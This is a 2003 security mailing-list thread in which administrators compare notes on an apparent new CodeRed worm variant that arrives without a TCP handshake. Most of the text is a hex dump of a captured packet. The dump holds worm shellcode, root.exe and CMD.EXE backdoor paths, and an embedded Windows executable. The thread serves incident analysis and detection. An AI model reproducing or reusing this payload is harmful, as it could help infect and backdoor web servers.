Security Incidents mailing list archives

RE: New CodeRed strain? -- UPDATE

From: "larosa, vjay" <larosa_vjay () emc com>
Date: Tue, 29 Apr 2003 22:38:03 -0400

AHA! I reported this about a month ago and everyone thought I was crazy! I
have all sorts of packet captures of this kind of activity. There are
cmd.exe attempts, root.exe attempts, and the classic default.ida?X and
default.ida?N attempts, but no TCP three way handshake. It is very strange.
Theses attempts are destined to IP addresses that are not even up and
running, never mind they are all fire walled off from the outside. We should
compare notes. If you want to you can contact me off the list.

vjl

-----Original Message-----
From: Frank Knobbe [mailto:fknobbe () knobbeits com] 
Sent: Monday, April 28, 2003 1:13 PM
To: incidents () securityfocus com
Subject: Re: New CodeRed strain? -- UPDATE

As I see it did make it to the list, here an update.

The reason this packet hasn't been tripping the usual signatures is
simple. We are receiving *only* the second packet. There is no first
packet with GET /default.ida?XXXX etc.

The packet itself appears to be classic CodeRed (II I believe), but
again, we're getting only the second packet. No TCP 3-way, for first
packet.

While keeping our eyes on this, the majority appears to be coming from
China, but we do some domestic (USA), Turkey, and I believe a Brazilian.

I'm curious if anyone else is seeing these second-packet-only CodeReds.

Regards,
Frank



On Fri, 2003-04-25 at 13:55, Frank Knobbe wrote:

Greetings,

we've been picking up some oddities since yesterday which look like a
new CodeRed variant. Traditional signatures didn't identify it as such,
but looking at the payload, it appears to be a CodeRed'ish type of bug.
We're starting a trap for a complete session now. (So far have only
isolated packets).

That isolated packet is below. I'll post the complete session once we
catch the whole thing. 

Has anyone else seen this?

Regards,
Frank

---8<---

04/25-17:44:56.268467 UTC 200.204.148.110:4699 -> x.x.x.x:80
TCP TTL:105 TOS:0x0 ID:49613 IpLen:20 DgmLen:1500 DF
***A**** Seq: 0xD7D856CE  Ack: 0xF3E3078  Win: 0x4470  TcpLen: 20
00 FF 75 FC FF 55 F8 89 45 D4 E8 0C 00 00 00 43  ..u..U..E......C
6C 6F 73 65 48 61 6E 64 6C 65 00 FF 75 FC FF 55  loseHandle..u..U
F8 89 45 D0 E8 08 00 00 00 5F 6C 63 72 65 61 74  ..E......_lcreat
00 FF 75 FC FF 55 F8 89 45 CC E8 08 00 00 00 5F  ..u..U..E......_
6C 77 72 69 74 65 00 FF 75 FC FF 55 F8 89 45 C8  lwrite..u..U..E.
E8 08 00 00 00 5F 6C 63 6C 6F 73 65 00 FF 75 FC  ....._lclose..u.
FF 55 F8 89 45 C4 E8 0E 00 00 00 47 65 74 53 79  .U..E......GetSy
73 74 65 6D 54 69 6D 65 00 FF 75 FC FF 55 F8 89  stemTime..u..U..
45 C0 E8 0B 00 00 00 57 53 32 5F 33 32 2E 44 4C  E......WS2_32.DL
4C 00 FF 55 F4 89 45 BC E8 07 00 00 00 73 6F 63  L..U..E......soc
6B 65 74 00 FF 75 BC FF 55 F8 89 45 B8 E8 0C 00  ket..u..U..E....
00 00 63 6C 6F 73 65 73 6F 63 6B 65 74 00 FF 75  ..closesocket..u
BC FF 55 F8 89 45 B4 E8 0C 00 00 00 69 6F 63 74  ..U..E......ioct
6C 73 6F 63 6B 65 74 00 FF 75 BC FF 55 F8 89 45  lsocket..u..U..E
A4 E8 08 00 00 00 63 6F 6E 6E 65 63 74 00 FF 75  ......connect..u
BC FF 55 F8 89 45 B0 E8 07 00 00 00 73 65 6C 65  ..U..E......sele
63 74 00 FF 75 BC FF 55 F8 89 45 A0 E8 05 00 00  ct..u..U..E.....
00 73 65 6E 64 00 FF 75 BC FF 55 F8 89 45 AC E8  .send..u..U..E..
05 00 00 00 72 65 63 76 00 FF 75 BC FF 55 F8 89  ....recv..u..U..
45 A8 E8 0C 00 00 00 67 65 74 68 6F 73 74 6E 61  E......gethostna
6D 65 00 FF 75 BC FF 55 F8 89 45 9C E8 0E 00 00  me..u..U..E.....
00 67 65 74 68 6F 73 74 62 79 6E 61 6D 65 00 FF  .gethostbyname..
75 BC FF 55 F8 89 45 98 E8 10 00 00 00 57 53 41  u..U..E......WSA
47 65 74 4C 61 73 74 45 72 72 6F 72 00 FF 75 BC  GetLastError..u.
FF 55 F8 89 45 94 E8 0B 00 00 00 55 53 45 52 33  .U..E......USER3
32 2E 44 4C 4C 00 FF 55 F4 89 45 90 E8 0E 00 00  2.DLL..U..E.....
00 45 78 69 74 57 69 6E 64 6F 77 73 45 78 00 FF  .ExitWindowsEx..
75 90 FF 55 F8 89 45 8C C3 8B 45 84 69 C0 05 84  u..U..E...E.i...
08 08 40 89 45 84 8D 84 04 78 56 34 12 F7 D8 C1  ..@.E....xV4....
C0 08 C3 E8 E1 FF FF FF 3C 00 74 F7 3C FF 74 F3  ........<.t.<.t.
C3 E8 ED FF FF FF 8A F8 E8 E6 FF FF FF 8A D8 C1  ................
E3 10 E8 DC FF FF FF 8A F8 E8 D5 FF FF FF 8A D8  ................
E8 B4 FF FF FF 83 E0 07 E8 20 00 00 00 FF FF FF  ......... ......
FF 00 FF FF FF 00 FF FF FF 00 FF FF FF 00 FF FF  ................
FF 00 00 FF FF 00 00 FF FF 00 00 FF FF 59 8B 04  .............Y..
81 23 D8 F7 D0 23 85 58 FE FF FF 0B D8 80 FB 7F  .#...#.X........
74 9F 80 FB E0 74 9A 3B 9D 58 FE FF FF 74 92 C3  t....t.;.X...t..
68 04 01 00 00 8D 85 5C FE FF FF 50 FF 55 E0 8D  h......\...P.U..
BC 05 5C FE FF FF E8 09 00 00 00 5C 43 4D 44 2E  ..\........\CMD.
45 58 45 00 5E FC A5 A5 A4 B3 63 6A 01 E8 1C 00  EXE.^.....cj....
00 00 64 3A 5C 69 6E 65 74 70 75 62 5C 73 63 72  ..d:\inetpub\scr
69 70 74 73 5C 72 6F 6F 74 2E 65 78 65 00 8B 0C  ipts\root.exe...
24 88 19 8D 85 5C FE FF FF 50 FF 55 DC 6A 01 E8  $....\...P.U.j..
2B 00 00 00 64 3A 5C 70 72 6F 67 72 61 7E 31 5C  +...d:\progra~1\
63 6F 6D 6D 6F 6E 7E 31 5C 73 79 73 74 65 6D 5C  common~1\system\
4D 53 41 44 43 5C 72 6F 6F 74 2E 65 78 65 00 8B  MSADC\root.exe..
0C 24 88 19 8D 85 5C FE FF FF 50 FF 55 DC E8 BA  .$....\...P.U...
05 00 00 FC 4D 5A 50 00 02 00 00 00 04 00 0F 00  ....MZP.........
FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 1A FC  ............@...
00 00 01 FC FC FC FC FC FC 00 00 50 45 00 00 4C  ...........PE..L
01 03 00 FD 2A 25 29 00 00 00 00 00 00 00 00 E0  ....*%).........
00 8F 81 0B 01 02 19 00 04 00 00 00 08 00 00 00  ................
00 00 00 00 10 00 00 00 10 00 00 00 20 00 00 00  ............ ...
00 40 00 00 10 00 00 00 04 00 00 01 00 00 00 00  .@..............
00 00 00 03 00 0A 00 00 00 00 00 00 40 00 00 00  ............@...
04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00  ................
20 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10   ...............
00 00 00 00 00 00 00 00 00 00 00 00 30 00 00 0C  ............0...
01 FC FC FC 00 00 00 00 00 00 00 00 00 00 00 00  ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10  ................
00 00 00 10 00 00 00 04 00 00 00 08 00 00 00 00  ................
00 00 00 00 00 00 00 00 00 00 20 00 00 60 00 00  .......... ..`..
00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 04  ........... ....
00 00 00 0C 00 00 00 00 00 00 00 00 00 00 00 00  ................
00 00 40 00 00 C0 00 00 00 00 00 00 00 00 00 10  ..@.............
00 00 00 30 00 00 00 04 00 00 00 10 00 00 00 00  ...0............
00 00 00 00 00 00 00 00 00 00 40 00 00 C0 FC FC  ..........@.....
FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC  ................
FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC  ................
FC FC FC FC FC FC FC FC FC FC 00 00 00 00 00 00  ................
00 00 00 00 00 00 00 00 00 00 68 04 01 00 00 68  ..........h....h
D0 20 40 00 E8 61 01 00 00 8D B8 D0 20 40 00 BE  . @..a...... @..
00 20 40 00 A5 A5 A5 A5 6A 01 68 D0 20 40 00 E8  . @.....j.h. @..
4C 01 00 00 E8 0C 00 00 00 68 C0 27 09 00 E8 31  L........h.'...1
01 00 00 EB EF 68 D8 24 40 00 68 3F 00 0F 00 6A  .....h.$@.h?...j
00 68 10 20 40 00 68 02 00 00 80 E8 32 01 00 00  .h. @.h.....2...
0B C0 75 26 6A 04 68 54 20 40 00 6A 04 6A 00 68  ..u&j.hT @.j.j.h
48 20 40 00 FF 35 D8 24 40 00 E8 0D 01 00 00 FF  H @..5.$@.......
35 D8 24 40 00 E8 0E 01 00 00 68 D8 24 40 00 68  5.$@..........h.$@.h
3F 00 0F 00 6A 00 68 58 20 40 00 68 02 00 00 80  ?...j.hX @.h....
E8 ED 00 00 00 0B C0 75 55 BD 9C 20 40 00 E8 4C  .......uU.. @..L
00 00 00 BD A8 20 40 00 E8 42 00 00 00 6A 09 68  ..... @..B...j.h
B8 20 40 00 6A 01 6A 00 68 B0 20 40 00 FF 35 D8  . @.j.j.h. @..5.
24 40 00 E8 B4 00 00 00 6A 09 68 C4 20 40 00 6A  $@......j.h. @.j
01 6A 00 68 B4 20 40 00 FF 35 D8 24 40 00 E8 99  .j.h. @..5.$@...
00 00 00 FF 35 D8 24 40 00 E8 9A 00 00 00 C3 C7  ....5.$@........
05 D0 24 40 00 00 04 00 00 68 D0 24 40 00 68 D0  ..$@.........h.$@.h.
20 40 00 68 D4 24 40 00 6A 00 55 FF 35 D8 24 40   @.h.$@.j.U.5.$@
00 E8 60 00 00 00 0B C0 75 49 A1 D0 24 40 00 0B  ..`.....uI..$@..
C0 74 40 BE D0 20 40 00 80 3E 00 74 36 46 66 81  .t@.. @..>.t6Ff.
7E FE 2C 2C 75 F2 C7 06 32 31 37 00 81 EE CC 20  ~.,,u...217.... 
40 00 89 35                                      @..5


----------------------------------------------------------------------------
Attend Black Hat Briefings & Training Europe, May 12-15 in Amsterdam, the 
world's premier event for IT and network security experts.  The two-day 
Training features 6 hand-on courses on May 12-13 taught by professionals.  
The two-day Briefings on May 14-15 features 24 top speakers with no vendor 
sales pitches.  Deadline for the best rates is April 25.  Register today to 
ensure your place. http://www.securityfocus.com/BlackHat-incidents 
----------------------------------------------------------------------------

Current thread:

Re: New CodeRed strain? -- UPDATE Justin Pryzby (Apr 29)
- <Possible follow-ups>
- RE: New CodeRed strain? -- UPDATE larosa, vjay (Apr 30)